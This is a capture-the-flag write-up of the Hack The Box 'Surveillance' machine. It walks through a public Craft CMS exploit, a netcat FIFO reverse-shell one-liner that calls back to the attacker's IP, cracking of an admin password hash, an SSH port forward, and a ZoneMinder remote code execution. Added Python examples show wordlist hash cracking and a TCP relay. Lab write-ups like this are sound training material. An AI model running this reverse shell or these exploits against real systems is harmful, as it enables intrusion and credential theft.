Surveillance (Hack The Box)
This is one of the first machines I pwned on Hack The Box! It was really exciting and painful to pwn this machine. Thank you HTB community for your valuable time and hints.
The machine involves heavy enumeration that leads to exploiting 'Craft CMS' for a low-privileged shell on the server. Privilege escalation was done by setting up a local port forward over SSH and exploiting 'ZoneMinder' through it.
Visiting the IP in Firefox, the site tried to redirect to the domain surveillance.htb, so I mapped the domain to the machine's IP (10.10.11.245) in the /etc/hosts file.
sudo nano /etc/hosts
I scanned the IP using nmap and got back only two open ports, which was good.
I visited surveillance.htb and got a web page about home security. The company offers Cameras, Intrusion, Perimeter Security, Access Control & Intercom services.
After analyzing the site for a while, I found the web page was using 'Craft CMS'. I did a keyword search in the page source (Ctrl-F for "CMS") and came across some version information.
Exploitation
After searching on NVD and ExploitDB, I found an exploit on GitHub.
sudo git clone https://github.com/Faelian/CraftCMS_CVE-2023-41892
cd CraftCMS_CVE-2023-41892
python3 craft-cms.py http://surveillance.htb/
I decided to run another reverse shell back to my machine.
On my attacker machine:
nc -nlvp 443
On the target machine (the port must match the listener, 443 here):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your IP here> 443 >/tmp/f
Once the shell connected back, I upgraded it to an interactive TTY:
/usr/bin/script -qc /bin/bash /dev/null
Now that I had access to the machine as www-data, I had to search and enumerate to escalate my privileges.
After searching the machine from dawn to dusk I found something interesting in a backup directory: a database file. It contained the credentials of the admin named matthew.
After cracking the hash with hashcat I found the password for the admin matthew.
I then connected to the machine using matthew's credentials.
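To show what hashcat is doing during that crack, here is an added example (not the writeup's hashcat run, and not Craft CMS's real password hashing): a small wordlist-plus-rules attack against a salted, iterated hash. The hash format ("$algo$rounds$salt$hex"), the salt, the wordlist and the target password are all constructed for the demo.

```python
import hashlib
import hmac
from typing import Iterable, Iterator, Optional

# Added example, not the hashcat run from the writeup: a wordlist-plus-rules
# attack on a salted, iterated hash, which is the same search hashcat performs
# at scale on a GPU. The "$algo$rounds$salt$hex" format, the salt and the
# wordlist below are constructed for the demo; the backup file's real format
# is not reproduced here.


def make_hash(algo: str, rounds: int, salt: str, password: str) -> str:
    """Salted, iterated digest in the demo's own $algo$rounds$salt$hex format."""
    digest = hashlib.new(algo, (salt + password).encode()).digest()
    for _ in range(rounds - 1):          # iteration slows each guess down
        digest = hashlib.new(algo, digest).digest()
    return f"${algo}${rounds}${salt}${digest.hex()}"


def parse_hash(stored: str) -> tuple[str, int, str, str]:
    """Split a stored $algo$rounds$salt$hex string into its fields."""
    _, algo, rounds, salt, hexdigest = stored.split("$")
    return algo, int(rounds), salt, hexdigest


def candidates(words: Iterable[str]) -> Iterator[str]:
    """Apply a handful of hashcat-style mangling rules to every wordlist entry."""
    suffixes = ("", "1", "123", "!", "2023", "2024")
    for w in words:
        for base in (w, w.capitalize(), w.upper()):
            for s in suffixes:
                yield base + s


def crack(stored: str, words: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose hash matches the stored one, or None."""
    algo, rounds, salt, hexdigest = parse_hash(stored)
    for cand in candidates(words):
        got = make_hash(algo, rounds, salt, cand).split("$")[-1]
        # constant-time compare: irrelevant offline, but the right habit
        if hmac.compare_digest(got, hexdigest):
            return cand
    return None


# Constructed sample input: one "backup" hash for the admin and a tiny wordlist.
WORDLIST = ["password", "welcome", "matthew", "zoneminder", "surveillance", "camera"]
SAMPLE_HASH = make_hash("sha256", 1000, "k9Xz", "Surveillance2023")

if __name__ == "__main__":
    print(crack(SAMPLE_HASH, WORDLIST))  # Surveillance2023
```

The rules here (capitalisation plus a few suffixes) are a tiny subset of hashcat's rule files; the point is that a salted hash only forces the attacker to recompute per salt, while the iteration count is what actually makes each guess expensive.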
sudo ssh -oHostKeyAlgorithms=+ssh-dss matthew@10.10.11.245
I found the user flag as soon as I logged in as matthew.
I ran linpeas and revisited the section highlighting active listening ports; port 8080 was interesting to me, since it had not shown up in the nmap scan and was only listening on localhost.
To reach this port I needed an SSH local port forward. A local port forward (ssh -L) binds a port on the client machine and tunnels every connection to it through the SSH session, where the server connects it to the given host:port, here 127.0.0.1:8080 as seen from the target.
On my attack machine I ran:
ssh -L 2222:127.0.0.1:8080 matthew@10.10.11.245
I visited http://127.0.0.1:2222 in a browser and was presented with a ZoneMinder login page.
As I had found credentials for ZoneMinder along with matthew's, I could use them here.
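To make the forwarding mechanism concrete, here is an added example (mine, not part of the writeup and not ssh's code): a minimal TCP relay that does the client-side job of ssh -L 2222:127.0.0.1:8080, minus the encrypted transport. It accepts connections on a local port and copies bytes in both directions to the forward target. The ports, the echo service standing in for ZoneMinder, and the request bytes are constructed for a loopback-only demo.

```python
import socket
import threading

# Added example: a plain TCP relay doing what `ssh -L 2222:127.0.0.1:8080` does
# on the client side, without the SSH transport. Connections to the listen port
# are accepted and every byte is copied to the forward target and back, so a
# service bound only to the target's loopback becomes reachable. All addresses
# and ports here are assumptions for a local demo, not the HTB machine.


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src hits EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(listen_host: str, listen_port: int,
                    target_host: str, target_port: int) -> socket.socket:
    """Listen on listen_host:listen_port and relay each client to target_host:target_port.

    Returns the listening socket; port 0 picks a free port (read it with getsockname()).
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((listen_host, listen_port))
    server.listen(16)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = server.accept()
            except OSError:          # listener closed: stop serving
                return
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:          # target unreachable: drop this client, keep serving
                client.close()
                continue
            # One thread per direction, like the two halves of the SSH channel.
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return server


def start_echo_service(host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Constructed stand-in for the loopback-only service (ZoneMinder on 8080)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"ECHO:" + conn.recv(4096))

    threading.Thread(target=serve, daemon=True).start()
    return srv


def fetch_through(listen_port: int, payload: bytes) -> bytes:
    """Connect to the forwarder as a browser would and return the reply."""
    with socket.create_connection(("127.0.0.1", listen_port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while chunk := s.recv(4096):
            out += chunk
    return out


def demo() -> bytes:
    """Wire everything together on free loopback ports and return the relayed reply."""
    svc = start_echo_service()
    fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", svc.getsockname()[1])
    try:
        return fetch_through(fwd.getsockname()[1], b"GET / HTTP/1.0\r\n\r\n")
    finally:
        fwd.close()
        svc.close()


if __name__ == "__main__":
    print(demo())
```

In the real tunnel the relay's two ends live on different hosts: the accept loop runs on the attacker box and the connect to 127.0.0.1:8080 happens on the target, which is why a loopback-only ZoneMinder is reachable. Bind the listen side to 127.0.0.1 (as ssh -L does by default), or anyone else on your network gets the same tunnel.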
I googled for any publicly available ZoneMinder exploits and came across yet another RCE.
The Python script I found is an exploit for CVE-2023-26035, an unauthenticated Remote Code Execution (RCE) vulnerability in ZoneMinder's snapshot handling. The same exploit is also available as a Metasploit module, which is what I used for the RCE.
And that's it, pwned!